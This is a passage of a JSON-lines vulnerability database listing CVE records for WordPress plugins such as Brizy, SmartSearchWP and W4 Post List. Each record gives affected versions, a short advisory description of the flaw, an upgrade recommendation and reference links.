version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.6\\\/includes\\\/metabox\\\/gallery-metabox\\\/gallery-metabox.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.6\\\/includes\\\/metabox\\\/gallery-metabox\\\/gallery-metabox.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.6\\\/includes\\\/metabox\\\/gallery-metabox\\\/gallery-metabox.php#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.6\\\/includes\\\/metabox\\\/gallery-metabox\\\/gallery-metabox.php#L162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7595a1f6-6923-4102-8efe-a414adebce65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7595a1f6-6923-4102-8efe-a414adebce65?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3457","slug":"ocean-extra","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'oceanwp_icon' shortcode in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.5\\\/includes\\\/shortcodes\\\/shortcodes.php#L838\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.4.5\\\/includes\\\/shortcodes\\\/shortcodes.php#L838\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277977\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themes.trac.wordpress.org\\\/browser\\\/oceanwp\\\/4.0.6\\\/inc\\\/oceanwp-theme-icons.php#L819\",\"name\":\"https:\\\/\\\/themes.trac.wordpress.org\\\/browser\\\/oceanwp\\\/4.0.6\\\/inc\\\/oceanwp-theme-icons.php#L819\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themes.trac.wordpress.org\\\/browser\\\/oceanwp\\\/4.0.6\\\/inc\\\/oceanwp-theme-icons.php#L866\",\"name\":\"https:\\\/\\\/themes.trac.wordpress.org\\\/browser\\\/oceanwp\\\/4.0.6\\\/inc\\\/oceanwp-theme-icons.php#L866\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/362a01c0-8b97-40dc-8af5-0d904da96576?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/362a01c0-8b97-40dc-8af5-0d904da96576?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10913","slug":"wp-clone-by-wp-academy","versionImpact":"2.4.6","versionEndExcluding":"2.4.7","description":"The Clone plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.4.6 via deserialization of untrusted input in the 'recursive_unserialized_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 2.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16569267-ab52-4b96-86f0-d37c470a3938?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16569267-ab52-4b96-86f0-d37c470a3938?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-clone-by-wp-academy\\\/\\\/tags\\\/2.4.6\\\/lib\\\/icit_srdb_replacer.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-clone-by-wp-academy\\\/\\\/tags\\\/2.4.6\\\/lib\\\/icit_srdb_replacer.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-clone-by-wp-academy\\\/tags\\\/2.4.7\\\/lib\\\/icit_srdb_replacer.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-clone-by-wp-academy\\\/tags\\\/2.4.7\\\/lib\\\/icit_srdb_replacer.php#L24\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6845","slug":"smartsearchwp","versionImpact":"2.4.5","versionEndExcluding":"2.4.6","description":"The Chatbot with ChatGPT WordPress plugin before 2.4.6 does not have proper authorization in one of its REST endpoint, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key","recommendation":"Update to version 2.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfaaa843-d89e-42d4-90d9-988293499d26\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cfaaa843-d89e-42d4-90d9-988293499d26\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6747","slug":"foogallery-premium","versionEndExcluding":"2.4.6","description":"The Best WordPress Gallery Plugin \u2013 FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom attributes in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping. This makes it possible for contributors and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dce8ac32-cab8-4e05-bf6f-cc348d0c9472?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dce8ac32-cab8-4e05-bf6f-cc348d0c9472?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/fooplugins.com\\\/foogallery-wordpress-gallery-plugin\\\/pricing\\\/\",\"name\":\"https:\\\/\\\/fooplugins.com\\\/foogallery-wordpress-gallery-plugin\\\/pricing\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22634","slug":"easy-booked","versionImpact":"2.4.5","versionEndExcluding":"2.4.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in MD Abu Jubayer Hossain Easy Booked \u2013 Appointment Booking and Scheduling Management System for WordPress allows Cross Site Request Forgery.This issue affects Easy Booked \u2013 Appointment Booking and Scheduling Management System for WordPress: from n\/a through 2.4.5.","recommendation":"Update to version 2.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-booked\\\/vulnerability\\\/wordpress-easy-booked-plugin-2-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-booked\\\/vulnerability\\\/wordpress-easy-booked-plugin-2-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4406","slug":"wpforo","versionImpact":"2.4.5","versionEndExcluding":"2.4.6","description":"The wpForo Forum plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.4.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 2.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.4.5\\\/includes\\\/functions.php#L2139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.4.5\\\/includes\\\/functions.php#L2139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.4.5\\\/includes\\\/functions.php#L2177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforo\\\/tags\\\/2.4.5\\\/includes\\\/functions.php#L2177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05b15f33-0f95-458f-8c21-16c0dd98c8bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05b15f33-0f95-458f-8c21-16c0dd98c8bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5674","slug":"newsletter-api","versionImpact":"2.4.5","versionEndExcluding":"2.4.6","description":"The Newsletter - API v1 and v2 addon plugin for WordPress is vulnerable to unauthorized subscribers management due to PHP type juggling issue on the check_api_key function in all versions up to, and including, 2.4.5. This makes it possible for unauthenticated attackers to list, create or delete newsletter subscribers. This issue affects only sites running the PHP version below 8.0","recommendation":"Update to version 2.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecd9800e-ce0f-45f3-bb66-3690c51d885b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecd9800e-ce0f-45f3-bb66-3690c51d885b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.thenewsletterplugin.com\\\/documentation\\\/developers\\\/newsletter-api-2\\\/\",\"name\":\"https:\\\/\\\/www.thenewsletterplugin.com\\\/documentation\\\/developers\\\/newsletter-api-2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1373","slug":"w4-post-list","versionEndExcluding":"2.4.6","description":"The W4 Post List WordPress plugin before 2.4.6 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa38f3e6-e04c-467c-969b-0f6736087589\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa38f3e6-e04c-467c-969b-0f6736087589\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1371","slug":"w4-post-list","versionEndExcluding":"2.4.6","description":"The W4 Post List WordPress plugin before 2.4.6 does not ensure that password protected posts can be accessed before displaying their content, which could allow any authenticated users to access them","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad5c167e-77f7-453c-9443-df6e07705d89\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad5c167e-77f7-453c-9443-df6e07705d89\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0374","slug":"w4-post-list","versionEndExcluding":"2.4.6","description":"The W4 Post List WordPress plugin before 2.4.6 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb10f2e-73b8-444c-90b2-5c84cdf6de5c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb10f2e-73b8-444c-90b2-5c84cdf6de5c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6846","slug":"smartsearchwp","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not validate access on some REST routes, allowing for an unauthenticated user to purge error and chat logs","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d48fdab3-669c-4870-a2f9-6c39a7c25fd8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d48fdab3-669c-4870-a2f9-6c39a7c25fd8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0072","slug":"wc-vendors","versionEndExcluding":"2.4.5","description":"The WC Vendors Marketplace WordPress plugin before 2.4.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb2b876f-7216-4f31-9d1f-a45405c545ce\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb2b876f-7216-4f31-9d1f-a45405c545ce\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13651","slug":"unusedcss","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The RapidLoad \u2013 Optimize Web Vitals Automatically plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_deactivate() function in all versions up to, and including, 2.4.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset some of the plugin's settings.","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232560%40unusedcss&new=3232560%40unusedcss&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232560%40unusedcss&new=3232560%40unusedcss&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87f9f052-2963-4548-9ff8-91dc2b4ecb43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87f9f052-2963-4548-9ff8-91dc2b4ecb43?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4047","slug":"broken-link-checker","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The Broken Link Checker plugin for WordPress is vulnerable to unauthorized data access due to a missing capability check on the ajax_full_status and ajax_dashboard_status functions in all versions up to, and including, 2.4.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view the plugin's status.","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker\\\/tags\\\/2.4.2\\\/legacy\\\/core\\\/core.php#L3272\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/broken-link-checker\\\/tags\\\/2.4.2\\\/legacy\\\/core\\\/core.php#L3272\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294992\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294992\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33ac910c-9531-45ea-84cf-1d379233f7d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33ac910c-9531-45ea-84cf-1d379233f7d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6843","slug":"smartsearchwp","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not sanitise and escape user inputs, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks against admins","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a5cb440-065a-445a-9a09-55bd5f782e85\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a5cb440-065a-445a-9a09-55bd5f782e85\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6847","slug":"smartsearchwp","versionImpact":"2.4.4","versionEndExcluding":"2.4.5","description":"The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users when submitting messages to the chatbot.","recommendation":"Update to version 2.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baa860bb-3b7d-438a-ad54-92bf8e21e851\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baa860bb-3b7d-438a-ad54-92bf8e21e851\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1937","slug":"brizy","versionImpact":"2.4.44","versionEndExcluding":"2.4.45","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_item' function in all versions up to, and including, 2.4.44. This makes it possible for authenticated attackers, with contributor access and above, to modify the content of arbitrary published posts, which includes the ability to insert malicious JavaScript.","recommendation":"Update to version 2.4.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb5f73c3-f40b-45d5-9947-c1a514d230f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb5f73c3-f40b-45d5-9947-c1a514d230f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112878\\\/brizy\\\/trunk\\\/editor\\\/api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112878\\\/brizy\\\/trunk\\\/editor\\\/api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3242","slug":"brizy","versionImpact":"2.4.44","versionEndExcluding":"2.4.45","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file extension validation in the validateImageContent function called via storeImages in all versions up to, and including, 2.4.43. This makes it possible for authenticated attackers, with contributor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Version 2.4.44 prevents the upload of files ending in .sh and .php. Version 2.4.45 fully patches the issue.","recommendation":"Update to version 2.4.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a414de0a-ae44-4955-bd25-ec6ad7860835?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a414de0a-ae44-4955-bd25-ec6ad7860835?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L547\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php#L547\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086506\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086506\\\/brizy\\\/trunk\\\/editor\\\/zip\\\/archiver.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112878\\\/brizy\\\/trunk?contextall=1&old=3086506&old_path=%2Fbrizy%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112878\\\/brizy\\\/trunk?contextall=1&old=3086506&old_path=%2Fbrizy%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1164","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's contact form widget error message and redirect URL in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping on user supplied error messages. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9746cd9f-afb2-41b2-9e31-7c77222d9cfd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9746cd9f-afb2-41b2-9e31-7c77222d9cfd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3667","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' field of multiple widgets in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0edfebc-bf6b-4346-9cd7-ce00007e3620?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0edfebc-bf6b-4346-9cd7-ce00007e3620?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/public\\\/editor-build\\\/282-wp\\\/editor\\\/js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/public\\\/editor-build\\\/282-wp\\\/editor\\\/js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2087","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form name values in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/694d0b49-c4dd-40f0-99c9-5eb8c3c08ba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/694d0b49-c4dd-40f0-99c9-5eb8c3c08ba9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.4.41\\\/admin\\\/views\\\/form-data.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.4.41\\\/admin\\\/views\\\/form-data.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1161","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Custom Attributes for blocks in all versions up to, and including, 2.4.43 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c955905-bf14-4afa-a282-0a8c74cd3b87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c955905-bf14-4afa-a282-0a8c74cd3b87?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3711","slug":"brizy","versionImpact":"2.4.43","versionEndExcluding":"2.4.44","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to unauthorized plugin setting update due to a missing capability check on the functions action_request_disable, action_change_template, and action_request_enable in all versions up to, and including, 2.4.43. This makes it possible for authenticated attackers, with contributor access or above, to enable\/disable the Brizy editor and modify the template used.","recommendation":"Update to version 2.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7092ce4a-bad9-4426-b94e-d9d688344272?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7092ce4a-bad9-4426-b94e-d9d688344272?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/admin\\\/main.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/trunk\\\/admin\\\/main.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086506%40brizy%2Ftrunk&old=3058896%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
